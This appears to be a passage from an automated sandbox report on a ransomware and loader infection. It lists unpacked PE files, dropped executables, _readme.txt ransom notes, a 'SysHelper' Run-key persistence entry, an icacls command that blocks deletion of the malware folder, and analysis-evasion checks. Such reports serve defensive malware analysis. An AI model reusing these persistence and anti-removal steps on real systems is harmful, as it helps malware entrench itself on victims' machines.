                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 9721.exe, 9721.exe, 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 124D.exe, 00000007.00000002.637838144.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, 124D.exe, 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 46F.exe, 00000009.00000002.648394809.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, F42F.exe, 0000000B.00000002.651980343.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 0000000C.00000002.686813260.0000000003980000.00000040.00001000.00020000.00000000.sdmp, 46F.exe, 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, F42F.exe, 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 00000013.00000002.656069794.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6E6C.exe, 00000016.00000002.660464369.0000000003920000.00000040.00001000.00020000.00000000.sdmp, 6E6C.exe, 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 46F.exe, 00000018.00000002.667734975.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, 46F.exe, 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 0000001B.00000002.671665065.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000003.00000000.567619641.00007FF883751000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000003.00000000.567619641.00007FF883751000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: StikyNot.pdb0 source: E3B7.exe, 0000001C.00000002.702958379.00000000047B5000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: E3B7.exe, 0000001C.00000002.702958379.00000000047B5000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 9721.exe, 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 124D.exe, 00000007.00000002.637838144.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, 124D.exe, 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 46F.exe, 00000009.00000002.648394809.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, F42F.exe, 0000000B.00000002.651980343.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 0000000C.00000002.686813260.0000000003980000.00000040.00001000.00020000.00000000.sdmp, 46F.exe, 0000000D.00000002.659138526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, F42F.exe, 0000000F.00000002.651586722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 00000013.00000002.656069794.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 00000014.00000002.797952336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6E6C.exe, 00000016.00000002.660464369.0000000003920000.00000040.00001000.00020000.00000000.sdmp, 6E6C.exe, 00000017.00000002.661107586.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 46F.exe, 00000018.00000002.667734975.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, 46F.exe, 00000019.00000002.798083058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 0000001A.00000002.707784475.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 0000001B.00000002.671665065.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, 9721.exe, 0000001D.00000002.686383358.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 9721.exe, 00000023.00000002.704356813.00000000039E0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: StikyNot.pdb source: E3B7.exe, 0000001C.00000002.702958379.00000000047B5000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: eex.pdb source: explorer.exe, 00000003.00000000.567619641.00007FF883751000.00000020.00000001.01000000.00000007.sdmp

                Data Obfuscation

                barindex
                Source: C:\Users\user\AppData\Local\Temp\9721.exeUnpacked PE file: 6.2.9721.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\46F.exeUnpacked PE file: 13.2.46F.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\F42F.exeUnpacked PE file: 15.2.F42F.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\9721.exeUnpacked PE file: 20.2.9721.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\6E6C.exeUnpacked PE file: 23.2.6E6C.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\46F.exeUnpacked PE file: 25.2.46F.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeUnpacked PE file: 26.2.9721.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeUnpacked PE file: 29.2.9721.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\3971.exeUnpacked PE file: 34.2.3971.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeUnpacked PE file: 39.2.9721.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.xafumih:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\uwjrhssUnpacked PE file: 4.2.uwjrhss.400000.0.unpack .text:ER;.data:W;.xafumih:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\9721.exeUnpacked PE file: 6.2.9721.exe.400000.0.unpack .text:ER;.data:W;.xoju:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\46F.exeUnpacked PE file: 13.2.46F.exe.400000.0.unpack .text:ER;.data:W;.tipeg:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\F42F.exeUnpacked PE file: 15.2.F42F.exe.400000.0.unpack .text:ER;.data:W;.tipeg:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\9721.exeUnpacked PE file: 20.2.9721.exe.400000.0.unpack .text:ER;.data:W;.xoju:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\6E6C.exeUnpacked PE file: 23.2.6E6C.exe.400000.0.unpack .text:ER;.data:W;.xoju:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\46F.exeUnpacked PE file: 25.2.46F.exe.400000.0.unpack .text:ER;.data:W;.tipeg:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeUnpacked PE file: 26.2.9721.exe.400000.0.unpack .text:ER;.data:W;.xoju:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeUnpacked PE file: 29.2.9721.exe.400000.0.unpack .text:ER;.data:W;.xoju:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\4C9F.exeUnpacked PE file: 30.2.4C9F.exe.400000.0.unpack .text:ER;.data:W;.hes:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\3971.exeUnpacked PE file: 34.2.3971.exe.400000.0.unpack .text:ER;.data:W;.tipeg:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeUnpacked PE file: 39.2.9721.exe.400000.0.unpack .text:ER;.data:W;.xoju:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Roaming\uwjrhssCode function: 4_2_01E6D3E3 push 623D8A45h; retf 4_2_01E6D3E8
                Source: C:\Users\user\AppData\Roaming\uwjrhssCode function: 4_2_01E6E23B push 6700D42Eh; retf 4_2_01E6E245
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_0388D0AF push ecx; retf 5_2_0388D0B2
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_03948F05 push ecx; ret 5_2_03948F18
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00428565 push ecx; ret 6_2_00428578
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,6_2_00412220
                Source: file.exeStatic PE information: section name: .xafumih
                Source: A843.exe.3.drStatic PE information: section name: .jak
                Source: 4C9F.exe.3.drStatic PE information: section name: .hes
                Source: 3971.exe.3.drStatic PE information: section name: .tipeg
                Source: 9721.exe.3.drStatic PE information: section name: .xoju
                Source: 124D.exe.3.drStatic PE information: section name: .tipeg
                Source: 46F.exe.3.drStatic PE information: section name: .tipeg
                Source: F42F.exe.3.drStatic PE information: section name: .tipeg
                Source: 6E6C.exe.3.drStatic PE information: section name: .xoju
                Source: AB42.exe.3.drStatic PE information: section name: .xoju
                Source: tgjrhss.3.drStatic PE information: section name: .hes
                Source: uwjrhss.3.drStatic PE information: section name: .xafumih
                Source: 9721.exe.6.drStatic PE information: section name: .xoju
                Source: build2.exe.20.drStatic PE information: section name: .wida
                Source: build2[1].exe.20.drStatic PE information: section name: .wida
                Source: build2.exe.25.drStatic PE information: section name: .wida
                Source: XandETC.exe.28.drStatic PE information: section name: .xdata
                Source: build3.exe.20.drStatic PE information: real checksum: 0x0 should be: 0x3ca6
                Source: 1543.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x460921
                Source: oldplayer.exe.28.drStatic PE information: real checksum: 0x0 should be: 0x401eb
                Source: build3[1].exe.20.drStatic PE information: real checksum: 0x0 should be: 0x3ca6
                Source: build3.exe.25.drStatic PE information: real checksum: 0x0 should be: 0x3ca6
                Source: E3B7.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x460921
                Source: mstsca.exe.38.drStatic PE information: real checksum: 0x0 should be: 0x3ca6
                Source: oneetx.exe.37.drStatic PE information: real checksum: 0x0 should be: 0x401eb
                Source: aafg31.exe.28.drStatic PE information: real checksum: 0x6919a should be: 0x729aa

                Persistence and Installation Behavior

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tgjrhssJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\uwjrhssJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A843.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeFile created: C:\Users\user\AppData\Local\Temp\oldplayer.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\oldplayer.exeFile created: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E3B7.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile created: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1543.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build2[1].exeJump to dropped file
                Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9721.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tgjrhssJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F42F.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeFile created: C:\Users\user\AppData\Local\Temp\aafg31.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6E6C.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\build3[1].exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeFile created: C:\Users\user\AppData\Local\Temp\XandETC.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\124D.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\46F.exeFile created: C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build2.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4C9F.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\46F.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\46F.exeFile created: C:\Users\user\AppData\Local\537f7094-d60c-4d6f-ab72-afcba0f739b8\build3.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile created: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3971.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\uwjrhssJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile created: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\AB42.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile created: C:\_readme.txt
                Source: C:\Users\user\AppData\Local\Temp\9721.exeFile created: C:\Users\user\_readme.txt
                Source: C:\Users\user\AppData\Local\Temp\9721.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\uwjrhss:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\tgjrhss:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\F42F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\F42F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\F42F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\F42F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\6E6C.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\6E6C.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\6E6C.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\6E6C.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3971.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3971.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3971.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3971.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\oldplayer.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: file.exe, 00000000.00000002.569604789.0000000001B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKO
                Source: uwjrhss, 00000004.00000002.632206059.0000000001E74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uwjrhssKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uwjrhssKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uwjrhssKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uwjrhssKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uwjrhssKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\uwjrhssKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
